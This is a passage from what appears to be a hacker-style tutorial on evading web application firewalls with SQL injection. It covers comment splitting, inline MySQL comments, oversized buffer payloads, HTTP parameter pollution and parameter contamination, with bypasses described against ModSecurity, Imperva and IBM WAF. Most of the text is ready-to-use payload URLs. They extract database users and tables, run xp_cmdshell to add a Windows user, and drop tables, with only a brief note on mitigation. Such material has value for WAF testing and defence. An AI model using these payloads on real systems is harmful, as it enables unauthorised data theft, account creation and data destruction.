t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block, 311 | msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1', 312 | tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}', 313 | setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}, 314 | setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" 315 | [End Rule]------------------------------------------------------------------------- 316 | 317 | We can bypass their filtering with this code: 318 | 319 | [Code]------------------------------------------------------------------------------ 320 | http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user 321 | [End Code]-------------------------------------------------------------------------- 322 | 323 | From this attack, We can bypass Mod Security rule. Let see what's happen !! 324 | 325 | MySQL Server supports 3 comment styles: 326 | - From a "#" character to the end of the line 327 | - From a "--" sequence to the end of the line 328 | - From a /* sequence to the following */ sequence, as in the C programming language. 329 | This syntax enables a comment to extend over multiple lines because the beginning and closing sequences need 330 | not be on the same line. 331 | 332 | The following example, We used "%0D%0A" as the new line characters. Let's take a look at the first request(to extract the DB user) 333 | The resulting SQL payload looked something like this: 334 | 335 | 0 div 1 union#foo*/*/bar 336 | select#foo 337 | 1,2,current_user 338 | 339 | However the SQL payload, when executed by the MySQL DB, looked something like this: 340 | 341 | 0 div 1 union select 1,2,current_user 342 | 343 | 344 | 5. Buffer Overflow 345 | 346 | WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of data. 347 | Give a large amount of data allows our code executing 348 | 349 | [Code]------------------------------------------------------------------------------ 350 | http://victim.com/news.php?id=1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141 351 | 414141414141….)+union+select+1,2,version(),database(),user(),6,7,8,9,10-- 352 | [End Code]-------------------------------------------------------------------------- 353 | 354 | 355 | 6. Inline Comments (Mysql Only) 356 | 357 | From MySQL 5.0 Reference Manual, MySQL Server supports some variants of C-style comments. These enable you to write 358 | code that includes MySQL extensions, but is still portable, by using comments of the following form: 359 | 360 | /*! MySQL-specific code */ 361 | 362 | In this case, MySQL Server parses and executes the code within the comment as it would any other SQL statement, 363 | but other SQL servers will ignore the extensions. 364 | 365 | A lot of WAFs filter SQL keywords like /union\sselect\ig We can bypass this filter by using inline comments. 366 | 367 | [Code]------------------------------------------------------------------------------ 368 | http://victim.com/news.php?id=1/*!UnIoN*/SeLecT+1,2,3-- 369 | [End Code]-------------------------------------------------------------------------- 370 | 371 | Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can 372 | add more inline comments 373 | 374 | [Code]------------------------------------------------------------------------------ 375 | http://victim.com/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables 376 | /*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()-- 377 | [End Code]-------------------------------------------------------------------------- 378 | 379 | 380 | 381 | ######################################## 382 | [0x03] - Advanced Bypassing Techniques 383 | ######################################## 384 | 385 | In this section, we offer 2 techniques are "HTTP Pollution: Split and Join" and "HTTP Parameter Contamination". 386 | From these techniques can bypass a lot of OpenSource and Commercial Web application firewall (WAF) 387 | 388 | 389 | ++++++++++++++++++++++++++++++++++++++++++++++++++++ 390 | [0x03a] - HTTP Parameter Pollution: Split and Join 391 | ++++++++++++++++++++++++++++++++++++++++++++++++++++ 392 | 393 | HTTP Pollution is a new class of injection vulnerability by Luca Carettoni and Stefano Di Paola. HPP is a quite simple but 394 | effective hacking technique. HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting 395 | query string. 396 | 397 | Example of HPP: "http://victim.com/search.aspx?par1=val1&par1=val2" 398 | 399 | HTTP Parameter Handling: (Example) 400 | 401 | +------------------------------------------------------------------+ 402 | | Web Server | Parameter Interpretation | Example | 403 | +------------------------------------------------------------------+ 404 | | ASP.NET/IIS | Concatenation by comma | par1=val1,val2 | 405 | | ASP/IIS | Concatenation by comma | par1=val1,val2 | 406 | | PHP/Apache | The last param is resulting | par1=val2 | 407 | | JSP/Tomcat | The first param is resulting | par1=val1 | 408 | | Perl/Apache | The first param is resulting | par1=val1 | 409 | | DBMan | Concatenation by two tildes | par1=val1~~val2 | 410 | +------------------------------------------------------------------+ 411 | 412 | What would happen with WAFs that do Query String parsing before applying filters ? (HPP can be used even to bypass WAFs) 413 | Some loose WAFs may analyze and validate a single parameter occurrence only (first or last one). Whenever the deal environment concatenates 414 | multiple occurrences (ASP, ASP.NET, DBMan,…) an aggressor can split the malicious payload. 415 | 416 | In a recent penetration test (Again), we were able to bypass a Imperva SecureSphere using "HPP+Inline Comment" on ASP/ASP.NET environment. 417 | This technique can bypass other Commercial WAFs too. More information about "HPP+Inline Comment" show below: 418 | 419 | 420 | #Real World Example: 421 | 422 | 1. Mod Security CRS (Credit: Lavakumar Kuppan) 423 | 424 | The following request matches against the ModSecurity CRS as a SQL Injection attack and is blocked. 425 | 426 | Forbidden: http://victim.com/search.aspx?q=select name,password from users 427 | 428 | When the same payload is split against multiple parameters of the same name ModSecurity fails to block it. 429 | 430 | Bypassed : http://victim.com/search.aspx?q=select name&q=password from users 431 | 432 | 433 | Let's see what's happen, ModSecurity's interpretation is 434 | 435 | q=select name 436 | q=password from users 437 | 438 | ASP/ASP.NET's interpretation is 439 | q=select name,password from users 440 | 441 | *Tip: This attack can be carried out on a POST variable in a similar way 442 | 443 | 444 | 2. Commercial WAFs 445 | 446 | Forbidden: http://victim.com/search.aspx?q=select name,password from users 447 | 448 | Now we use HPP+Inline comment to bypass it. 449 | 450 | Bypassed : http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users 451 | 452 | 453 | Analyzing, WAF's interpretation is 454 | 455 | q=select/* 456 | q=*/name 457 | q=password/* 458 | q=*/from/* 459 | q=*/users 460 | 461 | ASP/ASP.NET's interpretation is 462 | q=select/*,*/name,password/*,*/from/*,*/users 463 | q=select name,password from users 464 | 465 | 466 | 3. IBM Web Application Firewall (Credit: Wendel Guglielmetti Henrique of Trustwave's SpiderLabs) 467 | 468 | Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell “net user zeq3ul UrWaFisShiT /add” -- 469 | 470 | Now we use HPP+Inline comment to bypass it. 471 | 472 | Bypassed : http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ “net user lucifer UrWaFisShiT” /*&id=1*/ -- 473 | 474 | 475 | Analyzing, WAF's interpretation is 476 | 477 | id=1’; /* 478 | id=1*/ EXEC /* 479 | id=1*/ master..xp_cmdshell /* 480 | id=1*/ “net user zeq3ul UrWaFisShiT” /* 481 | id=1*/ -- 482 | 483 | ASP/ASP.NET's interpretation is 484 | id=1’; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ “net user zeq3ul UrWaFisShiT” /*,1*/ -- 485 | id=1’; EXEC master..xp_cmdshell “net user zeq3ul UrWaFisShiT” -- 486 | 487 | 488 | The easiest mitigation to this attack would be for the WAF to disallow multiple instances of the same parameter in a single HTTP request. 489 | This would prevent all variations of this attack. 490 | However this might not be possible in all cases as some applications might have a legitimate need for multiple duplicate parameters. 491 | And they might be designed to send and accept multiple HTTP parameters of the same name in the same request.To protect these applications the WAF 492 | should also interpret the HTTP request in the same way the web application would. 493 | 494 | 495 | ++++++++++++++++++++++++++++++++++++++++ 496 | [0x03b] - HTTP Parameter Contamination 497 | ++++++++++++++++++++++++++++++++++++++++ 498 | 499 | HTTP Parameter Contamination (HPC) original idea comes from the innovative approach found in HPP research by 500 | exploring deeper and exploiting strange behaviors in Web Server components, Web Applications and Browsers as a result of query string 501 | parameter contamination with reserved or non expects characters. 502 | 503 | Some facts: 504 | - The term Query String is commonly used to refer to the part between the "?" and the end of the URI 505 | - As defined in the RFC 3986, it is a series of field-value pairs 506 | - Pairs are separated by "&" or ";" 507 | - RFC 2396 defines two classes of characters: 508 | Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' () 509 | Reserved : ; / ? : @ & = + $ , 510 | Unwise : { } | \ ^ [ ] ` 511 | 512 | Different web servers have different logic for processing special created requests. There are more web server, backend platform and special character combinations, 513 | but we will stop here this time. 514 | 515 | Query string and Web server response (Example) 516 | 517 | +-----------------------------------------------------------+ 518 | | Query String | Web Servers response / GET values | 519 | +-----------------------------------------------------------+ 520 | | | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP | 521 | +-----------------------------------------------------------+ 522 | | ?test[1=2 | test_1=2 | test[1=2 | 523 | | ?test=% | test=% | test= | 524 | | ?test%00=1 | test=1 | test=1 | 525 | | ?test=1%001 | NULL | test=1 | 526 | | ?test+d=1+2 | test_d=1 2 | test d=1 2 | 527 | +-----------------------------------------------------------+ 528 | 529 | Magic character "%" affect to ASP/ASP.NET 530 | 531 | +--------------------------------------------------------------------+ 532 | | Keywords | WAF | ASP/ASP.NET | 533 | +--------------------------------------------------------------------+ 534 | | sele%ct * fr%om.. | sele%ct * fr%om.. | select * from.. | 535 | | ;dr%op ta%ble xxx | ;dr%op ta%ble xxx | ;drop table xxx | 536 | | | |